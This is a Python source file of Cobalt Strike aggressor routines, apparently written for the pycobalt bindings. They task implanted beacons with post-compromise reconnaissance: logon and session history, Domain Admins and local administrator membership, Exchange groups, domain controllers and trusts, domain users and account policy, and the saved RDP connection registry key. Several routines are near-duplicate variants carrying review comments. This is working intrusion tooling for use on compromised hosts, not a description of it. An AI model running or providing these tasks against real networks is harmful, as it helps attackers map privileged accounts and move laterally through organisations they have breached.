def _(bid):
    """Gather historical logon information from the beacon's host.

    Order of operations: run the shared host-recon import, list current
    logons and sessions through ``net``, then task one PowerPick job that
    calls ``Get-ExplicitLogons`` / ``Get-Logons``. Those two cmdlets are not
    defined here; presumably ``import_host_recon`` loads the script that
    provides them - verify against that helper before reusing this block.

    Args:
        bid: Beacon ID that receives the tasks.
    """
    import_host_recon(bid)

    for net_subcommand in ('logons', 'sessions'):
        aggressor.bnet(bid, net_subcommand)

    logon_script = helpers.code_string(r"""
        Write-Output "---------- Explicit logons, past 10 days ----------"
        Get-ExplicitLogons 10

        Write-Output "`n---------- Logons, past 100 events ----------"
        Get-Logons 100
        """)

    # silent=True is handed straight to bpowerpick; NOTE(review): it looks
    # like it suppresses the default "tasked" console line, which is why an
    # explicit btask message is emitted first - confirm in the pycobalt API.
    aggressor.btask(bid, 'Tasked beacon to get historical logon information')
    aggressor.bpowerpick(bid, logon_script, silent=True)
def _(bid):
    """Run a first-pass domain recon from the beacon.

    One PowerPick job prints the logon server plus the Domain Admins, local
    Administrators and "Exchange Trusted Subsystem" memberships; the DC list
    and domain trusts are then requested as separate ``net`` tasks.

    NOTE(review): the script ends with an ``echo "--- Domain trusts ---"``
    header but the trust data comes from the later ``bnet('domain_trusts')``
    job, so the header and the data arrive as separate beacon outputs and are
    unlikely to be contiguous in the console. A later variant of this routine
    in this file drops that header.

    Args:
        bid: Beacon ID that receives the tasks.
    """
    recon_script = textwrap.dedent(r"""
        echo "--- Domain ---"
        echo "$env:logonserver"
        echo "--- Domain admins ---"
        net group "domain admins" /domain
        echo "--- Local admins ---"
        net localgroup administrators

        echo "--- Exchange ---"
        net group "Exchange Trusted Subsystem" /domain 2>$null

        echo "--- Domain trusts ---"
        """)

    # 2>$null above discards the stderr line `net` prints when the Exchange
    # group does not exist in this domain.
    aggressor.bpowerpick(bid, recon_script)

    for net_subcommand in ('dclist', 'domain_trusts'):
        aggressor.bnet(bid, net_subcommand)
def _(bid):
    """Run a basic domain recon from the beacon.

    A single PowerPick job prints the logon server and three group
    memberships (Domain Admins, local Administrators, "Exchange Trusted
    Subsystem"); the DC list and domain trusts are fetched afterwards with
    separate ``net`` tasks. The ``2>$null`` redirection hides the stderr
    output ``net`` emits when the Exchange group is absent.

    Args:
        bid: Beacon ID that receives the tasks.
    """
    domain_script = textwrap.dedent(r"""
        echo "--- Domain ---"
        echo "$env:logonserver"

        echo "--- Domain admins ---"
        net group "domain admins" /domain

        echo "--- Local admins ---"
        net localgroup administrators

        echo "--- Exchange ---"
        net group "Exchange Trusted Subsystem" /domain 2>$null
        """)

    # An explicit btask line is written because the PowerPick job is
    # submitted with silent=True (presumably suppressing the default
    # "tasked" message - confirm in pycobalt).
    aggressor.btask(bid, 'Tasked beacon to perform basic domain recon')
    aggressor.bpowerpick(bid, domain_script, silent=True)

    for net_subcommand in ('dclist', 'domain_trusts'):
        aggressor.bnet(bid, net_subcommand)
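def _(bid):
    """Run a basic host recon from the beacon.

    Lists processes, current logons and sessions via the built-in beacon
    commands, then tasks one PowerPick job that prints system info, the
    current user's token details, the logon server and profile path, the
    RDP client's ``Default`` registry key (``2>$null`` hides the error when
    it is absent) and the working directory.

    The script is a raw string: the registry path contains ``\S``, ``\M``,
    ``\T`` and ``\D``, which are invalid escape sequences in a normal string
    literal. CPython keeps them verbatim but emits a DeprecationWarning
    (a SyntaxWarning from 3.12), so the raw form produces the identical
    command without the warning and matches the other recon routines in
    this file.

    Args:
        bid: Beacon ID that receives the tasks.
    """
    command = textwrap.dedent(r"""
        echo "--- Host ---"
        systeminfo

        echo "--- User ---"
        whoami /all
        echo "Domain: $env:logonserver"
        echo "Home: $env:userprofile"

        echo "--- Other ---"
        reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>$null

        echo "--- Location ---"
        pwd
        """)

    aggressor.bps(bid)
    aggressor.bnet(bid, 'logons')
    aggressor.bnet(bid, 'sessions')

    aggressor.bpowerpick(bid, command)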
def _(bid):
    """Enumerate domain objects from the beacon.

    Four built-in ``net`` tasks (computers, view, user, group) are issued
    first, then one PowerPick job prints the logon server and the domain
    users, groups and account policy.

    Args:
        bid: Beacon ID that receives the tasks.
    """
    for net_subcommand in ('computers', 'view', 'user', 'group'):
        aggressor.bnet(bid, net_subcommand)

    enum_script = textwrap.dedent("""
        echo "--- Domain ---"
        echo $env:logonserver
        echo "--- Domain users ---"
        net user /domain
        echo "--- Domain groups ---"
        net groups /domain
        echo "--- Domain accounts ---"
        net accounts /domain
        """)

    aggressor.bpowerpick(bid, enum_script)
def _(bid):
    """Enumerate domain objects from the beacon.

    Issues the built-in ``net`` tasks for computers, view, user and group,
    then submits one PowerPick job that prints the logon server and the
    domain users, groups and account policy. A near-identical variant of
    this routine exists in this file without the btask/silent pairing;
    which one is current cannot be told from here.

    Args:
        bid: Beacon ID that receives the tasks.
    """
    for net_subcommand in ('computers', 'view', 'user', 'group'):
        aggressor.bnet(bid, net_subcommand)

    enum_script = textwrap.dedent("""
        echo "--- Domain ---"
        echo $env:logonserver

        echo "--- Domain users ---"
        net user /domain

        echo "--- Domain groups ---"
        net groups /domain

        echo "--- Domain accounts ---"
        net accounts /domain
        """)

    # The explicit btask message stands in for the console line that
    # silent=True presumably suppresses on bpowerpick - confirm in pycobalt.
    aggressor.btask(bid, 'Tasked beacon to enumerate domain info')
    aggressor.bpowerpick(bid, enum_script, silent=True)